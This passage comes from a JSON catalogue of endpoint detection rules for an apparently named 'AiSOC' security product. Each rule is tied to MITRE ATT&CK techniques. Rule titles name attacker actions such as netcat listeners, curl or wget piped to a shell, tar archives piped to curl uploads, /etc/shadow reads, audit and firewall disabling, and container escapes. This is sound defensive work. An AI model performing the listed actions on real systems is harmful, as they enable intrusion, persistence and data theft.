"AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1222.001" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-icacls-deny-readonly.yaml" }, { "id": "det-endpoint-121", "type": "detection", "name": "takeown.exe Used Against System Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'takeown.exe Used Against System Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1222.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-takeown-system-path.yaml" }, { "id": "det-endpoint-122", "type": "detection", "name": "rundll32.exe shell32 Control_RunDLL Used Suspiciously", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'rundll32.exe shell32 Control_RunDLL Used Suspiciously'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218.011" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-rundll32-shell32-controlrunDLL.yaml" }, { "id": "det-endpoint-123", "type": "detection", "name": "Burst Of File Extension Renames To Common Ransom Markers", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Burst Of File Extension Renames To Common Ransom Markers'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1486" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-ransomware-ext-rename-burst.yaml" }, { "id": "det-endpoint-124", "type": "detection", "name": "Mass Shadow Copy Deletion Via WMI", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Mass Shadow Copy Deletion Via WMI'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-shadow-copy-mass-delete.yaml" }, { "id": "det-endpoint-125", "type": "detection", "name": "Office Application Spawned mshta.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Office Application Spawned mshta.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.005" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-office-spawn-mshta.yaml" }, { "id": "det-endpoint-126", "type": "detection", "name": "Office Application Spawned rundll32.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Office Application Spawned rundll32.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.011" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-office-spawn-rundll32.yaml" }, { "id": "det-endpoint-127", "type": "detection", "name": "OneNote Spawned cmd.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'OneNote Spawned cmd.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1204.002" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-onenote-spawn-cmd.yaml" }, { "id": "det-endpoint-128", "type": "detection", "name": "PDF Reader Spawned Shell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PDF Reader Spawned Shell'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1204.002" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-pdfreader-spawn-shell.yaml" }, { "id": "det-endpoint-129", "type": "detection", "name": "ISO File Mounted From User Temp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ISO File Mounted From User Temp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1204.002" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-iso-mount-from-temp.yaml" }, { "id": "det-endpoint-130", "type": "detection", "name": "LNK File Executed From Removable Media", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'LNK File Executed From Removable Media'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1204.002" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-lnk-file-from-removable.yaml" }, { "id": "det-endpoint-131", "type": "detection", "name": "Systemd Unit File Written By Non-Package Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Systemd Unit File Written By Non-Package Process'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.002" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-systemd-service-create-untrusted.yaml" }, { "id": "det-endpoint-132", "type": "detection", "name": "Systemd Timer Unit Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Systemd Timer Unit Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053.006" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-systemd-timer-create.yaml" }, { "id": "det-endpoint-133", "type": "detection", "name": "File Written Into /etc/cron.d Outside Package Mgr", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'File Written Into /etc/cron.d Outside Package Mgr'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1053.003" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-cron-d-write.yaml" }, { "id": "det-endpoint-134", "type": "detection", "name": "Anacron Job File Added", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Anacron Job File Added'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053.003" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-anacron-job-add.yaml" }, { "id": "det-endpoint-135", "type": "detection", "name": "at Job Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'at Job Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053.001" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-at-job-create.yaml" }, { "id": "det-endpoint-136", "type": "detection", "name": "/etc/rc.local Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/rc.local Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1037.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-rclocal-modified.yaml" }, { "id": "det-endpoint-137", "type": "detection", "name": "/etc/init.d/ Script Added By Non-Pkg Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/init.d/ Script Added By Non-Pkg Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1037.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-initd-script-add.yaml" }, { "id": "det-endpoint-138", "type": "detection", "name": "~/.bashrc Modified By Other User", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '~/.bashrc Modified By Other User'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-bashrc-modified-by-other-user.yaml" }, { "id": "det-endpoint-139", "type": "detection", "name": "~/.zshrc Modified By Other User", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '~/.zshrc Modified By Other User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-zshrc-modified-by-other-user.yaml" }, { "id": "det-endpoint-140", "type": "detection", "name": "/etc/pam.d/ Configuration Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/pam.d/ Configuration Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1556.003" ], "log_source": "linux", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-pam-d-modified.yaml" }, { "id": "det-endpoint-141", "type": "detection", "name": "NSS Module Installed In /usr/lib", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'NSS Module Installed In /usr/lib'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1556" ], "log_source": "linux", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-nss-module-installed.yaml" }, { "id": "det-endpoint-142", "type": "detection", "name": "New File Added Under /etc/sudoers.d/", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'New File Added Under /etc/sudoers.d/'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-sudoers-d-add.yaml" }, { "id": "det-endpoint-143", "type": "detection", "name": "Sudoers File Granted NOPASSWD Privilege", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Sudoers File Granted NOPASSWD Privilege'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.003" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-nopasswd-sudo-line.yaml" }, { "id": "det-endpoint-144", "type": "detection", "name": "Multiple Authorized Keys Appended In Short Window", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Multiple Authorized Keys Appended In Short Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-authorized-keys-bulk-append.yaml" }, { "id": "det-endpoint-145", "type": "detection", "name": "sshd_config PermitRootLogin Set To Yes", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'sshd_config PermitRootLogin Set To Yes'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1556.004" ], "log_source": "linux", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-ssh-config-permitrootlogin-yes.yaml" }, { "id": "det-endpoint-146", "type": "detection", "name": "auditd Service Stopped", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'auditd Service Stopped'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.012" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditd-stopped.yaml" }, { "id": "det-endpoint-147", "type": "detection", "name": "auditctl Used To Disable Audit Rules", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'auditctl Used To Disable Audit Rules'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.012" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditctl-disable.yaml" }, { "id": "det-endpoint-148", "type": "detection", "name": "rsyslog Configuration File Removed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'rsyslog Configuration File Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-syslog-config-removed.yaml" }, { "id": "det-endpoint-149", "type": "detection", "name": "/var/log/wtmp Or /var/log/btmp Modified Suspiciously", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/var/log/wtmp Or /var/log/btmp Modified Suspiciously'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1070.002" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-utmp-tampering.yaml" }, { "id": "det-endpoint-150", "type": "detection", "name": "Bash History File Truncated Or Removed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Bash History File Truncated Or Removed'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070.003" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-history-cleared.yaml" }, { "id": "det-endpoint-151", "type": "detection", "name": "HISTFILE Set To /dev/null", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'HISTFILE Set To /dev/null'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070.003" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-history-disabled-export.yaml" }, { "id": "det-endpoint-152", "type": "detection", "name": "SELinux Set To Permissive", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SELinux Set To Permissive'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-selinux-permissive.yaml" }, { "id": "det-endpoint-153", "type": "detection", "name": "AppArmor Profile Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AppArmor Profile Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-apparmor-disabled.yaml" }, { "id": "det-endpoint-154", "type": "detection", "name": "iptables -F Used To Flush Rules", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'iptables -F Used To Flush Rules'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-iptables-flush.yaml" }, { "id": "det-endpoint-155", "type": "detection", "name": "ufw Firewall Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ufw Firewall Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-ufw-disable.yaml" }, { "id": "det-endpoint-156", "type": "detection", "name": "/etc/shadow Read By Non-Root Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/shadow Read By Non-Root Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.008" ], "log_source": "linux", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-shadow-read.yaml" }, { "id": "det-endpoint-157", "type": "detection", "name": "/etc/passwd Modified By Non-Pkg Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/passwd Modified By Non-Pkg Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1136.001" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-passwd-modified.yaml" }, { "id": "det-endpoint-158", "type": "detection", "name": "SUID Bit Set On Newly Created Binary", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SUID Bit Set On Newly Created Binary'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.001" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-suid-binary-create.yaml" }, { "id": "det-endpoint-159", "type": "detection", "name": "SGID Bit Set On Newly Created Binary", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SGID Bit Set On Newly Created Binary'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548.001" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-guid-binary-create.yaml" }, { "id": "det-endpoint-160", "type": "detection", "name": "setuid Capability Granted To New Binary", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'setuid Capability Granted To New Binary'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.001" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-cap-setuid-binary.yaml" }, { "id": "det-endpoint-161", "type": "detection", "name": "/etc/passwd Read By Many Processes In Short Window", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/passwd Read By Many Processes In Short Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1087.001" ], "log_source": "linux", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-mass-userlist-read.yaml" }, { "id": "det-endpoint-162", "type": "detection", "name": "netcat Listening Mode Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'netcat Listening Mode Detected'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "linux", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-netcat-listen.yaml" }, { "id": "det-endpoint-163", "type": "detection", "name": "curl/wget Piped Directly To Shell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'curl/wget Piped Directly To Shell'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "linux", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-curl-piped-bash.yaml" }, { "id": "det-endpoint-164", "type": "detection", "name": "Docker Socket Accessed By Non-Root User", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Docker Socket Accessed By Non-Root User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-docker-socket-read-non-root.yaml" }, { "id": "det-endpoint-165", "type": "detection", "name": "Docker Socket Mounted Into Container", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Docker Socket Mounted Into Container'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-docker-socket-mounted-into-container.yaml" }, { "id": "det-endpoint-166", "type": "detection", "name": "Container Started With --pid=host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Started With --pid=host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-host-pid-namespace.yaml" }, { "id": "det-endpoint-167", "type": "detection", "name": "Container Started With --network=host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Started With --network=host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-host-network-namespace.yaml" }, { "id": "det-endpoint-168", "type": "detection", "name": "Container Granted CAP_SYS_ADMIN", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Granted CAP_SYS_ADMIN'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-cap-sys-admin-add.yaml" }, { "id": "det-endpoint-169", "type": "detection", "name": "/proc Re-Mounted With Read-Write", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/proc Re-Mounted With Read-Write'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-mount-procfs-rw.yaml" }, { "id": "det-endpoint-170", "type": "detection", "name": "Kernel Module Loaded With insmod", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Kernel Module Loaded With insmod'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.006" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-kernel-module-load-insmod.yaml" }, { "id": "det-endpoint-171", "type": "detection", "name": "eBPF Program Loaded By Non-Root", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'eBPF Program Loaded By Non-Root'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-ebpf-prog-load-non-root.yaml" }, { "id": "det-endpoint-172", "type": "detection", "name": "ptrace Attached To PID 1", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ptrace Attached To PID 1'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-ptrace-pid1.yaml" }, { "id": "det-endpoint-173", "type": "detection", "name": "memfd_create Then Executed Anonymous Memory Region", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'memfd_create Then Executed Anonymous Memory Region'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1620" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-memfd-create-then-execve.yaml" }, { "id": "det-endpoint-174", "type": "detection", "name": "tar Output Piped To curl Upload", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'tar Output Piped To curl Upload'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1041" ], "log_source": "linux", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-tar-pipe-curl.yaml" }, { "id": "det-endpoint-175", "type": "detection", "name": "rclone Binary Run On Non-Backup Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'rclone Binary Run On Non-Backup Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1041" ], "log_source": "linux", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-rclone-process.yaml" }, { "id": "det-endpoint-176", "type": "detection", "name": "Large Archive Created In /tmp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Large Archive Created In /tmp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1074.001" ], "log_source": "linux", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-large-stage-tmp.yaml" }, { "id": "det-endpoint-177", "type": "detection", "name": "base64 Decoded Then Executed In Shell", 